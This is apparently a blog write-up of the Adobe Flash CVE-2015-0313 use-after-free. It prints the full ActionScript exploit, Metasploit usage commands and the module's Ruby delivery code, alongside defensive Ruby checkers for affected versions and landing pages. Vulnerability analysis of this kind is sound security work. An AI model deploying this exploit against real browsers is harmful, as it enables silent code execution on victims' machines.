CVE-2015-0313 Investigation

7erry

In February 2015 Trend Micro disclosed that an Adobe Flash 0-day was being exploited in the wild: visiting a website compromised with it would silently download malware or pop up malicious advertisements, and the impact was broad. The 0-day was assigned CVE-2015-0313, the Adobe Flash Player Workers ByteArray UAF vulnerability, and its exploitation lets an attacker achieve arbitrary code execution.

Affected versions:

Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux
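As an added example (not from the original post and not Metasploit code), the affected ranges above expressed as a check a defender can run over an inventory of reported Flash Player versions. Everything here is this example's own convention: the platform keys, the half-open "[first affected, fixed-in)" ranges derived from the advisory text, and the constructed inventory records. Gem::Version from RubyGems does the numeric per-segment comparison. Note that the Metasploit module shown later in the post only targets 16.x up to 16.0.0.296, which is narrower than the advisory range used here.

```ruby
require 'rubygems'

# Vulnerable half-open ranges [first_affected, fixed_in) per platform, taken
# from the advisory statement: Windows/OS X before 13.0.0.269 and 14.x-16.x
# before 16.0.0.305; Linux before 11.2.202.442. Platform keys are our own.
AFFECTED_RANGES = {
  'windows' => [['0.0.0.0', '13.0.0.269'], ['14.0.0.0', '16.0.0.305']],
  'osx'     => [['0.0.0.0', '13.0.0.269'], ['14.0.0.0', '16.0.0.305']],
  'linux'   => [['0.0.0.0', '11.2.202.442']],
}.freeze

# Accept "16.0.0.296" as well as the comma form "16,0,0,296" that some
# clients report; return nil for anything that is not four numeric segments.
def parse_flash_version(str)
  m = str.to_s.strip.match(/\A(\d+)[.,](\d+)[.,](\d+)[.,](\d+)\z/)
  return nil unless m
  Gem::Version.new(m.captures.join('.'))
end

# True when the reported version lies inside one of the affected ranges.
# Unknown platforms and unparseable versions are reported as not affected
# so that a caller can treat nil/false uniformly; adapt if you prefer
# "unknown means investigate".
def vulnerable_to_cve_2015_0313?(platform, version_str)
  ranges = AFFECTED_RANGES[platform.to_s.downcase]
  return false unless ranges
  v = parse_flash_version(version_str)
  return false unless v
  ranges.any? do |first_affected, fixed_in|
    v >= Gem::Version.new(first_affected) && v < Gem::Version.new(fixed_in)
  end
end

# Constructed inventory records (hypothetical hosts, not real data).
SAMPLE_INVENTORY = [
  { host: 'ws-01',  platform: 'windows', flash: '16.0.0.296' },
  { host: 'ws-02',  platform: 'windows', flash: '16.0.0.305' },
  { host: 'lx-03',  platform: 'linux',   flash: '11,2,202,440' },
  { host: 'mac-04', platform: 'osx',     flash: '13.0.0.269' },
  { host: 'ws-05',  platform: 'windows', flash: 'unknown' },
].freeze

# Names of the hosts whose reported Flash build still needs the APSA15-02 update.
def hosts_needing_update(inventory)
  inventory
    .select { |r| vulnerable_to_cve_2015_0313?(r[:platform], r[:flash]) }
    .map { |r| r[:host] }
end

if __FILE__ == $0
  puts "Hosts needing update: #{hosts_needing_update(SAMPLE_INVENTORY).join(', ')}"
end
```

The boundary values matter: 13.0.0.269 and 16.0.0.305 are the fixed builds and must come out as not affected, while a 13.x build newer than 13.0.0.269 is outside both Windows ranges and is likewise clean.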

Vulnerability analysis

With page heap (hpa) enabled, running Flash Player under a debugger and opening the sample crashes the process on an Access Violation. Reversing the AVM is rather painful, so the analysis goes straight to the sample's source code.

    // Build how to:
    // 1. Download the AIRSDK, and use its compiler.
    // 2. Be sure to support 16.0 as target-player (flex-config.xml).
    // 3. Download the Flex SDK (4.6)
    // 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
    // (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
    // 5. Build with: mxmlc -o msf.swf Main.as

    // Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
    // Modified to be used from msf
    package
    {
        import flash.display.Sprite
        import flash.display.LoaderInfo
        import flash.events.Event
        import flash.utils.ByteArray
        import flash.system.Worker
        import flash.system.WorkerDomain
        import flash.system.MessageChannel
        import flash.system.ApplicationDomain
        import avm2.intrinsics.memory.casi32
        import mx.utils.Base64Decoder

        public class Exploit extends Sprite
        {
            private var ov:Vector.<Object> = new Vector.<Object>(80000)
            private var uv:Vector.<uint>
            private var ba:ByteArray = new ByteArray()
            private var worker:Worker
            private var mc:MessageChannel
            private var b64:Base64Decoder = new Base64Decoder()
            private var payload:ByteArray
            private var platform:String
            private var os:String
            private var exploiter:Exploiter

            public function Exploit()
            {
                if (Worker.current.isPrimordial) mainThread() //* in the constructor, check whether this is the main thread and dispatch to the matching function
                else workerThread()
            }

            private function mainThread():void
            {
                platform = LoaderInfo(this.root.loaderInfo).parameters.pl
                os = LoaderInfo(this.root.loaderInfo).parameters.os
                var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
                var pattern:RegExp = / /g;
                b64_payload = b64_payload.replace(pattern, "+")
                b64.decode(b64_payload)
                payload = b64.toByteArray()

                ba.length = 0x1000
                ba.shareable = true
                for (var i:uint = 0; i < ov.length; i++) {
                    ov[i] = new Vector.<uint>(1014)
                    ov[i][0] = 0xdeedbeef
                }
                for (i = 0; i < 70000; i += 2) {
                    delete(ov[i])
                }
                worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) //* create the background worker
                mc = worker.createMessageChannel(Worker.current)
                mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage) //* register the message handler
                worker.setSharedProperty("mc", mc)
                worker.setSharedProperty("ba", ba)
                ApplicationDomain.currentDomain.domainMemory = ba //* make the shareable ByteArray globally reachable as domainMemory
                worker.start()
            }

            private function workerThread():void
            {
                var ba:ByteArray = Worker.current.getSharedProperty("ba")
                var mc:MessageChannel = Worker.current.getSharedProperty("mc")
                ba.clear() //* clear the shared ByteArray, freeing its backing memory
                ov[0] = new Vector.<uint>(1022) //* each uint Vector has length 1022, i.e. 1022*4+8 = 0x1000 bytes, the size of ba
                mc.send("") //* notify the main thread
                while (mc.messageAvailable);
                for (var i:uint = 0;; i++) {
                    if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
                        ov[0][i] = 0xffffffff
                        break
                    }
                }
                ov[0][0xfffffffe] = 1014
                mc.send("")
            }

            private function onMessage(e:Event):void
            {
                var mod:uint = casi32(0, 1022, 0xFFFFFFFF) //* compare-and-swap the value at the domainMemory address
                Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
                if (mod == 1022) mc.receive()
                else {
                    for (var i:uint = 0; i < ov.length; i++) {
                        if (ov[i].length == 0xffffffff) {
                            uv = ov[i]
                        } else {
                            if (ov[i] != null) {
                                delete(ov[i])
                                ov[i] = null
                            }
                        }
                    }
                    if (uv == null) {
                        Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
                        return
                    }
                    exploiter = new Exploiter(this, platform, os, payload, uv)
                }
            }
        }
    }

What each function does is marked in the comments. In summary, the trigger flow of the vulnerability is:

  1. Create a child worker from the main worker, and share a ByteArray between the two workers.
  2. In the main worker, set the shared ByteArray as domainMemory.
  3. In the child worker, release the shared ByteArray's memory with ByteArray.clear().
  4. domainMemory can still reference the shared memory region at this point, because the child worker's call to clear() does not notify domainMemory to update its reference to the shared buffer.

This results in the use-after-free.

Exploitation

Search MSF for an exploit for this vulnerability:

msfconsole
msf6 > search cve-2015-0313

Search results:

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/browser/adobe_flash_worker_byte_array_uaf

Select the module and view its details:

msf6 > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > info

Module details:

       Name: Adobe Flash Player ByteArray With Workers Use After Free
Module: exploit/windows/browser/adobe_flash_worker_byte_array_uaf
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2015-02-02

Provided by:
Unknown
hdarwin
juan vazquez <juan.vazquez@metasploit.com>

Available targets:
Id Name
-- ----
=> 0 Automatic

Check supported:
No

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST ******* yes The local host or network interface to listen on. This must be an address on the local machine or ******* to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module exploits a use-after-free vulnerability in Adobe Flash Player. The
vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
is freed from an ActionScript worker, which can fill the memory and notify the main
thread to corrupt the new contents. This module has been tested successfully on
Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.296.

References:
https://nvd.nist.gov/vuln/detail/CVE-2015-0313
https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/


View the full module info with the info -d command.

Use the module to generate the trojan (the malicious page):

msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > set payload windows/exec
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > set CMD calc.exe
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > exploit

MSF then starts a web server locally and, when the target visits it, responds with a crafted HTML page that triggers the vulnerability.

Exploit analysis

The module's exploit is located at:

/usr/share/metasploit-framework/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb

The core code of the exploit is:

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking

      include Msf::Exploit::Remote::BrowserExploitServer

      def initialize(info={})
        super(update_info(info,
          'Name'           => 'Adobe Flash Player ByteArray With Workers Use After Free',
          'Description'    => %q{...},
          'License'        => MSF_LICENSE,
          'Author'         => [...],
          'References'     => [...],
          'Payload'        => {...},
          'Platform'       => 'win',
          'BrowserRequirements' => {
            :source  => /script|headers/i,
            :os_name => lambda do |os|
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
            end,
            :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
            :flash   => lambda { |ver| ver =~ /^16\./ && Rex::Version.new(ver) <= Rex::Version.new('16.0.0.296') },
            :arch    => ARCH_X86
          },
          'Targets'        => [...],
          'Privileged'     => false,
          'DisclosureDate' => '2015-02-02',
          'DefaultTarget'  => 0))
      end

      def exploit
        @swf = create_swf
        super
      end

      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")

        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end

        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end

      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        b64_payload = Rex::Text.encode_base64(target_payload)
        platform_id = 'win'
        os_name = target_info[:os_name]

        html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

        return html_template, binding()
      end

      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
        swf = ::File.open(path, 'rb') { |f| swf = f.read }

        swf
      end
    end

The exploitation approach is the same as in the analyzed PoC and as in conventional UAF exploitation, so it is not repeated here.
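The HTML the module serves has a recognisable shape: a 1x1 Flash object, allowScriptAccess set to always, and a FlashVars string whose sh= parameter carries a base64 blob that the SWF turns back into the payload. As an added example, not part of the post or of Metasploit, here is a small Ruby scanner that scores an HTTP response body against those three traits, the kind of check a proxy log or sandbox pipeline can apply to landing pages. The two sample bodies are constructed, with 300 filler bytes standing in for the payload; the trait names and the 64-byte threshold are this example's own choices.

```ruby
require 'base64'

# Constructed sample bodies (not captured traffic). The first mirrors the
# module's template; the second is an ordinary embedded video player.
LANDING_PAGE = <<~HTML
  <html><body>
  <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1" />
  <param name="movie" value="kQzTb.swf" />
  <param name="allowScriptAccess" value="always" />
  <param name="FlashVars" value="sh=#{Base64.strict_encode64('X' * 300)}&pl=win&os=Windows 7" />
  <param name="Play" value="true" />
  </object>
  </body></html>
HTML

BENIGN_PAGE = <<~HTML
  <html><body>
  <embed type="application/x-shockwave-flash" width="640" height="480"
         src="player.swf" FlashVars="autoplay=0&clip=intro" />
  </body></html>
HTML

# Extract every FlashVars value, whether given as <param name="FlashVars"
# value="..."> or as an attribute FlashVars="..." on <embed>.
def flashvars_of(html)
  html.scan(/FlashVars(?:"\s+value)?\s*=\s*"([^"]*)"/i).flatten
end

# Parse "k=v&k2=v2" into a hash; a bare key maps to an empty string.
def parse_query(str)
  str.split('&').map { |kv| k, v = kv.split('=', 2); [k, v.to_s] }.to_h
end

# Return the list of suspicious traits found in an HTML body.
def analyze_flash_embed(html, min_blob_bytes: 64)
  findings = []
  if html =~ /<(?:object|embed)\b[^>]*\bwidth="1"[^>]*\bheight="1"/i
    findings << 'hidden 1x1 Flash object'
  end
  if html =~ /allowScriptAccess(?:"\s+value)?\s*=\s*"?always/i
    findings << 'allowScriptAccess=always'
  end
  flashvars_of(html).each do |fv|
    sh = parse_query(fv)['sh']
    next if sh.nil?
    # The SWF turns spaces back into '+', so undo the same URL mangling here.
    blob = Base64.decode64(sh.tr(' ', '+'))
    if blob.bytesize >= min_blob_bytes
      findings << "FlashVars sh= carries a #{blob.bytesize}-byte base64 blob"
      break
    end
  end
  findings
end

# Flag a body when at least two traits co-occur: any single one is common in
# legitimate content, the combination is what the module's template looks like.
def suspicious_flash_landing?(html)
  analyze_flash_embed(html).size >= 2
end

if __FILE__ == $0
  { 'landing' => LANDING_PAGE, 'benign' => BENIGN_PAGE }.each do |name, body|
    puts "#{name}: suspicious=#{suspicious_flash_landing?(body)} #{analyze_flash_embed(body).inspect}"
  end
end
```

The scanner works on the response body alone; in practice you would also pair it with the serving headers the module sets (Cache-Control: no-cache, no-store and Pragma: no-cache on the SWF) and with a check of the client's Flash version against the affected ranges.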

Fix

patch

Adobe fixed the vulnerability by disallowing a ByteArray with the shareable property set from being assigned as domainMemory, which blocks the use-after-free.

References

Trend - Adobe Flash Player Unspecified Vulnerability (CVE-2015-0313)
ExploitDB - CVE-2015-0313
Microsoft Security Bulletin MS14-012 - Critical
NVD - CVE-2015-0313
CVE - CVE-2015-0313
漏洞战争 (Vulnerability Wars)

  • Title: CVE-2015-0313 Investigation
  • Author: 7erry
  • Created: 2025-05-05 18:53:57
  • Updated: 2025-05-05 18:53:57
  • Link: https://7erryx.github.io/2025/05/05/Vulnerability Investigation/CVE-2015-0313-Investigation/
  • License: This work is licensed under CC BY-NC-SA 4.0.